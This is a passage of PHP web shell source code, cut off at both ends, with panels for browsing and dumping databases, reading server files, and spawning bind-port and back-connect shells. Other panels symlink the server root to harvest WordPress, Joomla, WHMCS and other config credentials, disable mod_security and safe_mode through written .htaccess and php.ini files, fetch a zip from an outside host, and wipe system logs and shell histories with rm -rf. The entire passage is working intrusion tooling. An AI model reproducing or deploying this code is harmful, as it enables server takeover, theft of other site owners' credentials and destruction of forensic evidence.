\$this->query('SELECT * FROM '.\$table);\r\n while(\$item = \$this->fetch()) { \$columns = array();\r\n foreach(\$item as \$k=>\$v) { \$item[\$k] = \"'\".addslashes(\$v).\"'\";\r\n \$columns[] = \$k;\r\n } echo 'INSERT INTO '.\$table.' ('.implode(\", \", \$columns).') VALUES ('.implode(\", \", \$item).');\r\n'.\"\\n\";\r\n } break;\r\n } return false;\r\n } };\r\n \$db = new DbClass(@\$_POST['type']);\r\n if(@\$_POST['p2']=='download') { ob_start(\"ob_gzhandler\", 4096);\r\n \$db->connect(\$_POST['sql_host'], \$_POST['sql_login'], \$_POST['sql_pass'], \$_POST['sql_base']);\r\n \$db->selectdb(\$_POST['sql_base']);\r\n header(\"Content-Disposition: attachment;\r\n filename=dump.sql\");\r\n header(\"Content-Type: text/plain\");\r\n foreach(\$_POST['tbl'] as \$v) \$db->dump(\$v);\r\n exit;\r\n } printHeader();\r\n echo '<h1>Sql browser</h1><div class=content>\r\n <form name=\"sf\" method=\"post\">\r\n <table cellpadding=\"2\" cellspacing=\"0\">\r\n <tr>\r\n <td>Type</td>\r\n <td>Host</td>\r\n <td>Login</td>\r\n <td>Password</td>\r\n <td>Database</td>\r\n <td></td>\r\n </tr>\r\n <tr>\r\n <input type=hidden name=a value=Sql>\r\n <input type=hidden name=p1 value=\\'query\\'>\r\n <input type=hidden name=p2>\r\n <input type=hidden name=c value=\"'.htmlspecialchars(\$GLOBALS['cwd']).'\">\r\n <input type=hidden name=charset value=\"'.(isset(\$_POST['charset'])?\$_POST['charset']:'').'\">\r\n <td>\r\n <select name=\\'type\\'>\r\n <option value=\"mysql\" '.(@\$_POST['type']=='mysql'?'selected':'').'>MySql</option>\r\n <option value=\"pgsql\" '.(@\$_POST['type']=='pgsql'?'selected':'').'>PostgreSql</option>\r\n </select></td>\r\n <td><input type=text name=sql_host value=\"'.(empty(\$_POST['sql_host'])?'localhost':htmlspecialchars(\$_POST['sql_host'])).'\"></td>\r\n <td><input type=text name=sql_login value=\"'.(empty(\$_POST['sql_login'])?'root':htmlspecialchars(\$_POST['sql_login'])).'\"></td>\r\n <td><input type=text name=sql_pass 
value=\"'.(empty(\$_POST['sql_pass'])?'':htmlspecialchars(\$_POST['sql_pass'])).'\"></td>\r\n <td>';\r\n \$tmp = \"<input type=text name=sql_base value=''>\";\r\n if(isset(\$_POST['sql_host'])){ if(\$db->connect(\$_POST['sql_host'], \$_POST['sql_login'], \$_POST['sql_pass'], \$_POST['sql_base'])) { switch(\$_POST['charset']) { case \"Windows-1251\": \$db->setCharset('cp1251');\r\n break;\r\n case \"UTF-8\": \$db->setCharset('utf8');\r\n break;\r\n case \"KOI8-R\": \$db->setCharset('koi8r');\r\n break;\r\n case \"KOI8-U\": \$db->setCharset('koi8u');\r\n break;\r\n case \"cp866\": \$db->setCharset('cp866');\r\n break;\r\n } \$db->listDbs();\r\n echo \"<select name=sql_base><option value=''></option>\";\r\n while(\$item = \$db->fetch()) { list(\$key, \$value) = each(\$item);\r\n echo '<option value=\"'.\$value.'\" '.(\$value==\$_POST['sql_base']?'selected':'').'>'.\$value.'</option>';\r\n } echo '</select>';\r\n } else echo \$tmp;\r\n }else echo \$tmp;\r\n echo '</td>\r\n <td><input type=submit value=\">>\"></td>\r\n </tr>\r\n </table>\r\n <script>\r\n function st(t,l) {\r\n document.sf.p1.value = \\'select\\';\r\n\r\n document.sf.p2.value = t;\r\n\r\n if(l!=null)document.sf.p3.value = l;\r\n\r\n document.sf.submit();\r\n\r\n }\r\n function is() {\r\n for(i=0;\r\ni<document.sf.elements[\\'tbl[]\\'].length;\r\n++i)\r\n document.sf.elements[\\'tbl[]\\'][i].checked = !document.sf.elements[\\'tbl[]\\'][i].checked;\r\n\r\n }\r\n </script>';\r\n if(isset(\$db) && \$db->link){ echo \"<br/><table width=100% cellpadding=2 cellspacing=0>\";\r\n if(!empty(\$_POST['sql_base'])){ \$db->selectdb(\$_POST['sql_base']);\r\n echo \"<tr><td width=1 style='border-top:2px solid #666;\r\nborder-right:2px solid #666;\r\n'><span>Tables:</span><br><br>\";\r\n \$tbls_res = \$db->listTables();\r\n while(\$item = \$db->fetch(\$tbls_res)) { list(\$key, \$value) = each(\$item);\r\n \$n = \$db->fetch(\$db->query('SELECT COUNT(*) as n FROM '.\$value.''));\r\n \$value = htmlspecialchars(\$value);\r\n 
echo \"<nobr><input type='checkbox' name='tbl[]' value='\".\$value.\"'>&nbsp;\r\n<a href=# onclick=\\\"st('\".\$value.\"')\\\">\".\$value.\"</a> (\".\$n['n'].\")</nobr><br>\";\r\n } echo \"<input type='checkbox' onclick='is();\r\n'> <input type=button value='Dump' onclick='document.sf.p2.value=\\\"download\\\";\r\ndocument.sf.submit();\r\n'></td><td style='border-top:2px solid #666;\r\n'>\";\r\n if(@\$_POST['p1'] == 'select') { \$_POST['p1'] = 'query';\r\n \$db->query('SELECT COUNT(*) as n FROM '.\$_POST['p2'].'');\r\n \$num = \$db->fetch();\r\n \$num = \$num['n'];\r\n echo \"<span>\".\$_POST['p2'].\"</span> (\$num) \";\r\n for(\$i=0;\r\n\$i<(\$num/30);\r\n\$i++) if(\$i != (int)\$_POST['p3']) echo \"<a href='#' onclick='st(\\\"\".\$_POST['p2'].\"\\\", \$i)'>\",(\$i+1),\"</a> \";\r\n else echo (\$i+1),\" \";\r\n if(\$_POST['type']=='pgsql') \$_POST['p3'] = 'SELECT * FROM '.\$_POST['p2'].' LIMIT 30 OFFSET '.(\$_POST['p3']*30);\r\n else \$_POST['p3'] = 'SELECT * FROM `'.\$_POST['p2'].'` LIMIT '.(\$_POST['p3']*30).',30';\r\n echo \"<br><br>\";\r\n } if((@\$_POST['p1'] == 'query') && !empty(\$_POST['p3'])) { \$db->query(@\$_POST['p3']);\r\n if(\$db->res !== false) { \$title = false;\r\n echo '<table width=100% cellspacing=0 cellpadding=2 class=main>';\r\n \$line = 1;\r\n while(\$item = \$db->fetch()) { if(!\$title) { echo '<tr>';\r\n foreach(\$item as \$key => \$value) echo '<th>'.\$key.'</th>';\r\n reset(\$item);\r\n \$title=true;\r\n echo '</tr><tr>';\r\n \$line = 2;\r\n } echo '<tr class=\"l'.\$line.'\">';\r\n \$line = \$line==1?2:1;\r\n foreach(\$item as \$key => \$value) { if(\$value == null) echo '<td><i>null</i></td>';\r\n else echo '<td>'.nl2br(htmlspecialchars(\$value)).'</td>';\r\n } echo '</tr>';\r\n } echo '</table>';\r\n } else { echo '<div><b>Error:</b> '.htmlspecialchars(\$db->error()).'</div>';\r\n } } echo \"<br><textarea name='p3' style='width:100%;\r\nheight:100px'>\".@htmlspecialchars(\$_POST['p3']).\"</textarea><br/><input type=submit 
value='Execute'>\";\r\n echo \"</td></tr>\";\r\n } echo \"</table></form><br/><form onsubmit='document.sf.p1.value=\\\"loadfile\\\";\r\ndocument.sf.p2.value=this.f.value;\r\ndocument.sf.submit();\r\nreturn false;\r\n'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>\";\r\n if(@\$_POST['p1'] == 'loadfile') { \$db->query(\"SELECT LOAD_FILE('\".addslashes(\$_POST['p2']).\"') as file\");\r\n \$file = \$db->fetch();\r\n echo '<pre class=ml1>'.htmlspecialchars(\$file['file']).'</pre>';\r\n } } echo '</div>';\r\n printFooter();\r\n } function actionNetwork() { printHeader();\r\n \$back_connect_c=\"\";\r\n \$back_connect_p=\"\";\r\n \$bind_port_c=\"\";\r\n \$bind_port_p=\"\";\r\n echo '<h1>Network tools</h1><div class=content>\r\n <form name=\\'nfp\\' onSubmit=\"g(null,null,this.using.value,this.port.value,this.pass.value);\r\nreturn false;\r\n\">\r\n <br /><span>Bind port to /bin/sh</span><br/>\r\n Port: <input type=\\'text\\' name=\\'port\\' value=\\'443\\'> Password: <input type=\\'text\\' name=\\'pass\\' value=\\'smurf\\'> Using: <select name=\"using\"><option value=\\'bpc\\'>C</option><option value=\\'bpp\\'>Perl</option></select> <input type=submit value=\">>\">\r\n </form>\r\n <form name=\\'nfp\\' onSubmit=\"g(null,null,this.using.value,this.server.value,this.port.value);\r\nreturn false;\r\n\">\r\n <br /><br /><span>Back-connect to</span><br/>\r\n Server: <input type=\\'text\\' name=\\'server\\' value=\"'.\$_SERVER['REMOTE_ADDR'].'\"> Port: <input type=\\'text\\' name=\\'port\\' value=\\'443\\'> Using: <select name=\"using\"><option value=\\'bcc\\'>C</option><option value=\\'bcp\\'>Perl</option></select> <input type=submit value=\">>\">\r\n </form><br>';\r\n if(isset(\$_POST['p1'])) { function cf(\$f,\$t) { \$w=@fopen(\$f,\"w\") or @function_exists('file_put_contents');\r\n if(\$w) { @fwrite(\$w,@base64_decode(\$t)) or @fputs(\$w,@base64_decode(\$t)) or @file_put_contents(\$f,@base64_decode(\$t));\r\n 
@fclose(\$w);\r\n } } if(\$_POST['p1'] == 'bpc') { cf(\"/tmp/bp.c\",\$bind_port_c);\r\n \$out = ex(\"gcc -o /tmp/bp /tmp/bp.c\");\r\n @unlink(\"/tmp/bp.c\");\r\n \$out .= ex(\"/tmp/bp \".\$_POST['p2'].\" \".\$_POST['p3'].\" &\");\r\n echo \"<pre class=ml1>\$out\\n\".ex(\"ps aux | grep bp\").\"</pre>\";\r\n } if(\$_POST['p1'] == 'bpp') { cf(\"/tmp/bp.pl\",\$bind_port_p);\r\n \$out = ex(which(\"perl\").\" /tmp/bp.pl \".\$_POST['p2'].\" &\");\r\n echo \"<pre class=ml1>\$out\\n\".ex(\"ps aux | grep bp.pl\").\"</pre>\";\r\n } if(\$_POST['p1'] == 'bcc') { cf(\"/tmp/bc.c\",\$back_connect_c);\r\n \$out = ex(\"gcc -o /tmp/bc /tmp/bc.c\");\r\n @unlink(\"/tmp/bc.c\");\r\n \$out .= ex(\"/tmp/bc \".\$_POST['p2'].\" \".\$_POST['p3'].\" &\");\r\n echo \"<pre class=ml1>\$out\\n\".ex(\"ps aux | grep bc\").\"</pre>\";\r\n } if(\$_POST['p1'] == 'bcp') { cf(\"/tmp/bc.pl\",\$back_connect_p);\r\n \$out = ex(which(\"perl\").\" /tmp/bc.pl \".\$_POST['p2'].\" \".\$_POST['p3'].\" &\");\r\n echo \"<pre class=ml1>\$out\\n\".ex(\"ps aux | grep bc.pl\").\"</pre>\";\r\n } } echo '</div>';\r\n printFooter();\r\n } function actionPortScanner() { printHeader();\r\n echo '<h1>Port Scanner</h1>';\r\n echo '<div class=\"content\">';\r\n echo '<form action=\"\" method=\"post\">';\r\n if(isset(\$_POST['host']) && is_numeric(\$_POST['end']) && is_numeric(\$_POST['start'])){ \$start = strip_tags(\$_POST['start']);\r\n \$end = strip_tags(\$_POST['end']);\r\n \$host = strip_tags(\$_POST['host']);\r\n for(\$i = \$start;\r\n \$i<=\$end;\r\n \$i++){ \$fp = @fsockopen(\$host, \$i, \$errno, \$errstr, 3);\r\n if(\$fp){ echo 'Port '.\$i.' 
is <font color=green>open</font><br>';\r\n } flush();\r\n } } else { echo '<br /><br /><center><input type=\"hidden\" name=\"a\" value=\"PortScanner\"><input type=\"hidden\" name=p1><input type=\"hidden\" name=\"p2\">\r\n <input type=\"hidden\" name=\"c\" value=\"'.htmlspecialchars(\$GLOBALS['cwd']).'\">\r\n <input type=\"hidden\" name=\"charset\" value=\"'.(isset(\$_POST['charset'])?\$_POST['charset']:'').'\">\r\n Host: <input type=\"text\" name=\"host\" value=\"localhost\"/><br /><br />\r\n Port start: <input type=\"text\" name=\"start\" value=\"0\"/><br /><br />\r\n Port end:<input type=\"text\" name=\"end\" value=\"5000\"/><br /><br />\r\n <input type=\"submit\" value=\"Scan Ports\" />\r\n </form></center><br /><br />';\r\n } echo '</div>';\r\n printFooter();\r\n } function actionReadable() { printHeader();\r\n echo '<h1>Readable Dirs</h1>';\r\n echo '<div class=\"content\">';\r\n \$sm = ini_get('safe_mode');\r\n if(\$sm) { echo '<br /><b>Error: safe_mode = on</b><br /><br />';\r\n } else { @\$passwd = fopen('/etc/passwd','r');\r\n if (!\$passwd) { echo '<br /><b>[-] Error : coudn`t read /etc/passwd</b><br /><br />';\r\n } else { \$pub = array();\r\n \$users = array();\r\n \$conf = array();\r\n \$i = 0;\r\n while(!feof(\$passwd)) { \$str = fgets(\$passwd);\r\n if (\$i > 35) { \$pos = strpos(\$str,':');\r\n \$username = substr(\$str,0,\$pos);\r\n \$dirz = '/home/'.\$username.'/public_html/';\r\n if ((\$username != '')) { if (is_readable(\$dirz)) { array_push(\$users,\$username);\r\n array_push(\$pub,\$dirz);\r\n } } } \$i++;\r\n } echo '<br><br>';\r\n echo \"[+] Founded \".sizeof(\$users).\" entrys in /etc/passwd\\n\".\"<br />\";\r\n echo \"[+] Founded \".sizeof(\$pub).\" readable public_html directories\\n\".\"<br /><br /><br />\";\r\n foreach (\$users as \$user) { \$path = \"/home/\$user/public_html/\";\r\n echo \$path.\"<br>\";\r\n } echo \"<br /><br /><br />[+] Complete...\\n\".\"<br />\";\r\n } } echo '</div>';\r\n printFooter();\r\n } function 
actionSymlink() { printHeader();\r\n echo '<h1>Symlink</h1>';\r\n \$furl = 'http://'.\$_SERVER['SERVER_NAME'].\$_SERVER['REQUEST_URI'];\r\n \$expld = explode('/',\$furl );\r\n \$burl =str_replace(end(\$expld),'',\$furl);\r\n echo '<div class=\"content\"><center>\r\n <h3>[ <a href=\"#\" onclick=\"g(\\'symlink\\',null,\\'website\\',null)\">Domains</a> ] - \r\n [ <a href=\"#\" onclick=\"g(\\'symlink\\',null,\\'whole\\',null)\">Whole Server Symlink</a> ] - \r\n [ <a href=\"#\" onclick=\"g(\\'symlink\\',null,\\'config\\',null)\">Config files symlink</a> ]</h3></center>';\r\n if(isset(\$_POST['p1']) && \$_POST['p1']=='website') { echo \"<center>\";\r\n \$d0mains = @file(\"/etc/named.conf\");\r\n if(!\$d0mains){ echo \"<pre class=ml1 style='margin-top:5px'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>\";\r\n } else { echo \"<table align=center class='main' border=0 ><tr><th> Count </th><th> Domains </th><th> Users </th></tr>\";\r\n \$unk = array();\r\n foreach(\$d0mains as \$d0main){ if(@eregi(\"zone\",\$d0main)){ preg_match_all('#zone \"(.*)\"#', \$d0main, \$domains);\r\n flush();\r\n if(strlen(trim(\$domains[1][0])) > 2){ \$unk[] = \$domains[1][0];\r\n flush();\r\n } } } \$count=1;\r\n \$unk = array_unique(\$unk);\r\n \$l=0;\r\n foreach(\$unk as \$d){ \$user = posix_getpwuid(@fileowner(\"/etc/valiases/\".\$d));\r\n echo \"<tr\".(\$l?' 
class=l1':'').\"><td>\".\$count.\"</td><td><a href=http://\".\$d.\"/>\".\$d.\"</a></td><td>\".\$user['name'].\"</td></tr>\";\r\n flush();\r\n \$count++;\r\n \$l=\$l?0:1;\r\n } echo \"</table>\";\r\n } echo \"</center>\";\r\n } if(isset(\$_POST['p1']) && \$_POST['p1']=='whole') { echo \"<center>\";\r\n @mkdir('sym',0777);\r\n \$hdt = \"Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any\";\r\n \$hfp =@fopen ('sym/.htaccess','w');\r\n fwrite(\$hfp ,\$hdt);\r\n if(function_exists('symlink')) { @symlink('/','sym/root');\r\n } \$d0mains = @file('/etc/named.conf');\r\n if(!\$d0mains) { echo \"<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>\";\r\n } else { echo \"<table align='center' width='40%' class='main'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>\";\r\n \$count=1;\r\n \$mck = array();\r\n foreach(\$d0mains as \$d0main){ if(@eregi('zone',\$d0main)){ preg_match_all('#zone \"(.*)\"#',\$d0main,\$domain);\r\n flush();\r\n if(strlen(trim(\$domain[1][0])) >2){ \$mck[] = \$domain[1][0];\r\n } } } \$mck = array_unique(\$mck);\r\n \$l=0;\r\n foreach(\$mck as \$d) { \$user = posix_getpwuid(@fileowner('/etc/valiases/'.\$d));\r\n \$ddt = \$user['name'];\r\n \$ddt = \$d;\r\n if(@eregi(\"\\.ir\",\$d) or @eregi(\"\\.il\",\$d)) { \$ddt = \"<div style=' color: #FF0000 ;\r\n text-shadow: 0px 0px 1px red;\r\n '>\".\$d.'</div>';\r\n } echo \"<tr\".(\$l?' class=l1':'').\"><td>\".\$count++.\"</td><td><a target='_blank' href=http://\".\$d.'/>'.\$ddt.' 
</a></td><td>'.\$user['name'].\"</td><td><a href='sym/root/home/\".\$user['name'].\"/public_html' target='_blank'>symlink </a></td></tr>\";\r\n flush();\r\n \$l=\$l?0:1;\r\n } echo '</table>';\r\n } echo \"</center>\";\r\n } if(isset(\$_POST['p1']) && \$_POST['p1']=='config') { echo \"<center>\";\r\n @mkdir('sym',0777);\r\n \$hdt = \"Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any\";\r\n \$hfp = @fopen ('sym/.htaccess','w');\r\n @fwrite(\$hfp ,\$hdt);\r\n if(function_exists('symlink')) { @symlink('/','sym/root');\r\n } \$d0mains = @file('/etc/named.conf');\r\n if(!\$d0mains) { echo \"<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>\";\r\n } else { echo \"<table align='center' width='40%' class='main' ><tr><th> Count </th><th> Domains </th><th> Script </th></tr>\";\r\n \$count = 1;\r\n \$l=0;\r\n foreach(\$d0mains as \$d0main){ if(@eregi('zone',\$d0main)){ preg_match_all('#zone \"(.*)\"#',\$d0main,\$domain);\r\n flush();\r\n if(strlen(trim(\$domain[1][0]))>2){ \$user = posix_getpwuid(@fileowner('/etc/valiases/'.\$domain[1][0]));\r\n \$c1 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/wp-config.php';\r\n \$ch01 = get_headers(\$c1);\r\n \$cf01 = \$ch01[0];\r\n \$c2 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/blog/wp-config.php';\r\n \$ch02 = get_headers(\$c2);\r\n \$cf02 = \$ch02[0];\r\n \$c3 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/configuration.php';\r\n \$ch03 = get_headers(\$c3);\r\n \$cf03 = \$ch03[0];\r\n \$c4 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/joomla/configuration.php';\r\n \$ch04 = get_headers(\$c4);\r\n \$cf04 = \$ch04[0];\r\n \$c5 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/includes/config.php';\r\n \$ch05 = get_headers(\$c5);\r\n \$cf05 = \$ch05[0];\r\n \$c6 = 
\$burl.'/sym/root/home/'.\$user['name'].'/public_html/vb/includes/config.php';\r\n \$ch06 = get_headers(\$c6);\r\n \$cf06 = \$ch06[0];\r\n \$c7 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/forum/includes/config.php';\r\n \$ch07 = get_headers(\$c7);\r\n \$cf07 = \$ch07[0];\r\n \$c8 = \$burl.'/sym/root/home/'.\$user['name'].'public_html/clients/configuration.php';\r\n \$ch08 = get_headers(\$c8);\r\n \$cf08 = \$ch08[0];\r\n \$c9 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/support/configuration.php';\r\n \$ch09 = get_headers(\$c9);\r\n \$cf09 = \$ch09[0];\r\n \$c10 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/client/configuration.php';\r\n \$ch10 = get_headers(\$c10);\r\n \$cf10 = \$ch10[0];\r\n \$c11 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/submitticket.php';\r\n \$ch11 = get_headers(\$c11);\r\n \$cf11 = \$ch11[0];\r\n \$c12 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/client/configuration.php';\r\n \$ch12 = get_headers(\$c12);\r\n \$cf12 = \$ch12[0];\r\n \$c13 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/includes/configure.php';\r\n \$ch13 = get_headers(\$c13);\r\n \$cf13 = \$ch13[0];\r\n \$c14 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/include/app_config.php';\r\n \$ch14 = get_headers(\$c14);\r\n \$cf14 = \$ch14[0];\r\n \$c15 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/sites/default/settings.php';\r\n \$ch15 = get_headers(\$c15);\r\n \$cf15 = \$ch15[0];\r\n \$out = '&nbsp;\r\n';\r\n if(strpos(\$cf01,'200') == true) { \$out = \"<a href='\".\$c1.\"' target='_blank'>Wordpress</a>\";\r\n } elseif(strpos(\$cf02,'200') == true) { \$out = \"<a href='\".\$c2.\"' target='_blank'>Wordpress</a>\";\r\n } elseif(strpos(\$cf03,'200') == true && strpos(\$cf11,'200') == true) { \$out = \" <a href='\".\$c11.\"' target='_blank'>WHMCS</a>\";\r\n } elseif(strpos(\$cf09,'200') == true) { \$out = \" <a href='\".\$c9.\"' target='_blank'>WHMCS</a>\";\r\n } elseif(strpos(\$cf10,'200') == true) { 
\$out = \" <a href='\".\$c10.\"' target='_blank'>WHMCS</a>\";\r\n } elseif(strpos(\$cf03,'200') == true) { \$out = \" <a href='\".\$c3.\"' target='_blank'>Joomla</a>\";\r\n } elseif(strpos(\$cf04,'200') == true) { \$out = \" <a href='\".\$c4.\"' target='_blank'>Joomla</a>\";\r\n } elseif(strpos(\$cf05,'200') == true) { \$out = \" <a href='\".\$c5.\"' target='_blank'>vBulletin</a>\";\r\n } elseif(strpos(\$cf06,'200') == true) { \$out = \" <a href='\".\$c6.\"' target='_blank'>vBulletin</a>\";\r\n } elseif(strpos(\$cf07,'200') == true) { \$out = \" <a href='\".\$c7.\"' target='_blank'>vBulletin</a>\";\r\n } elseif(strpos(\$cf08,'200') == true) { \$out = \" <a href='\".\$c7.\"' target='_blank'>Client Area</a>\";\r\n } elseif(strpos(\$cf12,'200') == true) { \$out = \" <a href='\".\$c7.\"' target='_blank'>Client Area</a>\";\r\n } elseif(strpos(\$cf13,'200') == true) { \$out = \" <a href='\".\$c7.\"' target='_blank'>osCommerce/Zen Cart</a>\";\r\n } elseif(strpos(\$cf14,'200') == true) { \$out = \" <a href='\".\$c7.\"' target='_blank'>Magento</a>\";\r\n } elseif(strpos(\$cf15,'200') == true) { \$out = \" <a href='\".\$c7.\"' target='_blank'>Drupal</a>\";\r\n } else { continue;\r\n } echo '<tr'.(\$l?' 
class=l1':'').'><td>'.\$count++.'</td><td><a href=http://www.'.\$domain[1][0].'/>'.\$domain[1][0].'</a></td><td>'.\$user['name'].'</td><td>'.\$out.'</td></tr>';\r\n flush();\r\n \$l=\$l?0:1;\r\n } } } echo \"</table>\";\r\n } echo \"</center>\";\r\n } echo \"</div>\";\r\n printFooter();\r\n } function actionSafeMode() { printHeader();\r\n echo '<h1>Safe Mode</h1>';\r\n echo '<div class=\"content\">';\r\n echo \"<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| \".\$GLOBALS['cwd'].\" |<br><br />\";\r\n echo '<a href=# onclick=\"g(null,null,\\'php.ini\\',null)\">| PHP.INI | </a><a href=# onclick=\"g(null,null,null,\\'ini\\')\">| .htaccess(Mod) | </a><a href=# onclick=\"g(null,null,null,null,\\'sh\\')\">| .htaccess(perl) | </a></center>';\r\n if(!empty(\$_POST['p2']) && isset(\$_POST['p2'])) { \$fil=fopen(\$GLOBALS['cwd'].\".htaccess\",\"w\");\r\n fwrite(\$fil,'<IfModule mod_security.c>\r\n Sec------Engine Off\r\n Sec------ScanPOST Off\r\n </IfModule>');\r\n fclose(\$fil);\r\n } if(!empty(\$_POST['p1'])&& isset(\$_POST['p1'])) { \$fil=fopen(\$GLOBALS['cwd'].\"php.ini\",\"w\");\r\n fwrite(\$fil,'safe_mode=OFF\r\n disable_functions=NONE');\r\n fclose(\$fil);\r\n } if(!empty(\$_POST['p3']) && isset(\$_POST['p3'])) { \$fil=fopen(\$GLOBALS['cwd'].\".htaccess\",\"w\");\r\n fwrite(\$fil,'Options FollowSymLinks MultiViews Indexes ExecCGI\r\n AddType application/x-httpd-cgi .sh\r\n AddHandler cgi-script .pl\r\n AddHandler cgi-script .pl');\r\n fclose(\$fil);\r\n } echo \"<br><br /><br /></div>\";\r\n echo '</div>';\r\n printFooter();\r\n} function actionSQLBUDDY(){ printHeader();\r\n if(!file_exists('yazilimlar/sqlbuddy/index.php')){ \$dizin = 'https://byr00t.co/vb/sqlbuddy.zip';\r\n function dosya_indir(\$link,\$name=null) { \$link_info = pathinfo(\$link);\r\n \$uzanti = 
strtolower(\$link_info['extension']);\r\n \$file = (\$name) ? \$name.'.'.\$uzanti : \$link_info['basename'];\r\n \$curl = curl_init(\$link);\r\n \$fopen = fopen(\$file,'w');\r\n curl_setopt(\$curl, CURLOPT_HEADER,0);\r\n curl_setopt(\$curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt(\$curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt(\$curl, CURLOPT_FILE, \$fopen);\r\n curl_exec(\$curl);\r\n curl_close(\$curl);\r\n fclose(\$fopen);\r\n } dosya_indir(\$dizin, \"sqlbuddy\");\r\n \$zip = new ZipArchive();\r\n \$file = 'sqlbuddy.zip';\r\n \$zip->open(\$file);\r\n \$cikar = \$zip->extractTo('yazilimlar/');\r\n if(file_exists('sqlbuddy.zip')){ @unlink('sqlbuddy.zip');\r\n } if(\$cikar){ echo \"<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> \";\r\n } else{ echo '<div class=\"alert alert-danger\"><strong>Hata!</strong> Dosya indirilirken kritik bir hata olu\xc3\x85\xc5\xb8tu.</div>';\r\n } } elseif(file_exists('yazilimlar/sqlbuddy/index.php')){ echo \"<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> \";\r\n } printFooter();\r\n } function actionDeleteLOG(){ printHeader();\r\n echo '<h1>Delete Logs</h1>';\r\n function cmdExe(\$in) { \$out = '';\r\n if (function_exists('passthru')) { ob_start();\r\n @passthru(\$in);\r\n \$out = ob_get_clean();\r\n } else if (function_exists('exec')) { @exec(\$in,\$out);\r\n \$out = @join(\"\\n\",\$out);\r\n } elseif (function_exists('system')) { ob_start();\r\n @system(\$in);\r\n \$out = ob_get_clean();\r\n } elseif (function_exists('shell_exec')) { \$out = shell_exec(\$in);\r\n } elseif (is_resource(\$f = @popen(\$in,\"r\"))) { \$out = \"\";\r\n while(!@feof(\$f)) \$out .= fread(\$f,1024);\r\n pclose(\$f);\r\n } return \$out;\r\n } cmdExe(\"rm -rf /tmp/logs\");\r\n cmdExe(\"rm -rf /root/.ksh_history\");\r\n cmdExe(\"rm -rf /root/.bash_history\");\r\n cmdExe(\"rm -rf /root/.bash_logout\");\r\n cmdExe(\"rm -rf /usr/local/apache/logs\");\r\n 
cmdExe(\"rm -rf /usr/local/apache/log\");\r\n cmdExe(\"rm -rf /var/apache/logs\");\r\n cmdExe(\"rm -rf /var/apache/log\");\r\n cmdExe(\"rm -rf /var/run/utmp\");\r\n cmdExe(\"rm -rf /var/logs\");\r\n cmdExe(\"rm -rf /var/log\");\r\n cmdExe(\"rm -rf /var/adm\");\r\n cmdExe(\"rm -rf /etc/wtmp\");\r\n cmdExe(\"rm -rf /etc/utmp\");\r\n cmdExe(\"rm -rf \$HISTFILE\");\r\n cmdExe(\"rm -rf /var/log/lastlog\");\r\n cmdExe(\"rm -rf /var/log/wtmp\");\r\n echo '<div style=\"padding:5px;\r\n\">\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /tmp/logs <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /root/.ksh_history <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /root/.bash_history <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /usr/local/apache/logs <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /usr/local/apache/log <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /var/apache/logs <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /var/apache/log <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /var/run/utmp <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /var/adm <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /etc/wtmp <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> \$HISTFILE<br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /var/log/lastlog <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /var/log/wtmp <br>\r\n </div>';\r\n printFooter();\r\n } function actionPython(){ printHeader();\r\n if(!is_dir('python')){ mkdir('python', 0755);\r\n } chdir('python');\r\n\$kokdosya = \".htaccess\";\r\n \$dosya_adi = \"\$kokdosya\";\r\n \$dosya = fopen (\$dosya_adi , 'w') or die (\"Dosya a&#231;\r\n&#305;\r\nlamad&#305;\r\n!\");\r\n \$metin = \"AddHandler cgi-script .r00t\";\r\n fwrite ( 
